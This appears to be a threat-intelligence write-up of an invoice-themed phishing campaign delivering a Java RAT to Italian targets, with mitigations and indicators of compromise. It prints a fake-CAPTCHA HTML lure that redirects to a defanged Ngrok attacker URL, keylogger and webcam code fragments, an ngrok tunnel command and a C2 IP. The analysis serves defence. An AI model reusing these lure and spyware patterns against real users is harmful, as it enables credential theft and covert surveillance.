A recent campaign targeting Southern European organizations demonstrates advanced evasion techniques combining social engineering, trusted platforms, and geolocation filtering. The attack chain unfolds through four precision stages:
1. Legitimacy Engineering via SPF-Bypass
Attackers abused Spain’s serviciodecorreo.es email service, whose SPF records were authorized across multiple target domains. This enabled malicious emails to pass SPF/DKIM checks while displaying forged sender addresses like:
From: Accounting <invoice@[target-company-domain]
2. Weaponized PDF Lure
The attached PDF mimicked a Medinova Health Group invoice containing a clickable Dropbox link to an HTML file (Fattura.html). The file implemented a multi-stage verification process:
<!-- Stage 1: Fake CAPTCHA -->
<div class="g-recaptcha" data-sitekey="6Lc8Xp4UAAAAA..."
data-callback="onCaptchaSuccess"></div>
<!-- Stage 2: Ngrok redirection -->
<script>
function redirectToDoc() {
window.location.href="hxxps://3c7f-185-107-57-126.ngrok-free.app/view";
}
</script>
3. Geolocation-Aware payload delivery
Ngrok’s tunneling service enabled dynamic content switching based on victim location:
| Geolocation | Content Delivered | Platform Used |
|---|---|---|
| Italy | FA-43-03-2025.jar (RATty) | MediaFire |
| Non-Italy | Benign Google Drive PDF | GDrive |
This geo-fencing bypassed automated sandboxes typically hosted in cloud regions outside Italy.
4. Cross-Platform RAT Execution
The final JAR file (SHA256: a1c2861a68b2a4d62b6fbfc7534f498cefe5f92f720466d24ae1b66ebc9f5731) leverages Java’s cross-platform capabilities with these post-exploitation features:
// Keylogging implementation
public class KeyLogger implements KeyListener {
public void keyTyped(KeyEvent e) {
logToFile(String.valueOf(e.getKeyChar()));
}
}
// Webcam activation
Webcam webcam = Webcam.getDefault();
webcam.open();
Evasion Taxonomy
The campaign employed a layered obfuscation matrix:
- Infrastructure camouflage
- Ngrok tunnels masking C2 infrastructure
- Legitimate CDNs (MediaFire, Dropbox) for payload hosting
- Contextual deception
- Neutral filenames (FA-43-03-2025.jar)
- Invoice-themed lures matching sector-specific expectations
- Protocol abuse
# Ngrok tunnel creation command ngrok http 80 --region=eu --subdomain=targetco-invoice
Mitigation strategies
Fortinet’s defense-in-depth approach neutralizes this threat through:
FortiMail protections
- Content Disarm & Reconstruction (CDR) for Office/PDF files
- Real-time URL rescanning with FortiSandbox integration
Network-Level defenses
# Sample FortiGate AV signature update config antivirus settings set default-db extended set grayware enable endUser resilience
- Phishing simulations targeting:
- Urgency exploitation patterns
- Document verification workflows
- Geolocation-based content expectations
This campaign underscores the critical need for behavior-aware email security that analyzes both content and context beyond traditional signature-based detection. The combination of geo-aware filtering and trusted platform abuse suggests a new normal in advanced email threats that demands equally sophisticated defense postures.
Indicators of Compromise
| Type | Value |
|---|---|
| SHA256 | a1c2861a68b2a4d62b6fbfc7534f498c… |
| C2 IP | 143.47.53.106 |
| Ngrok Domain | 3c7f-185-107-57-126.ngrok-free.app |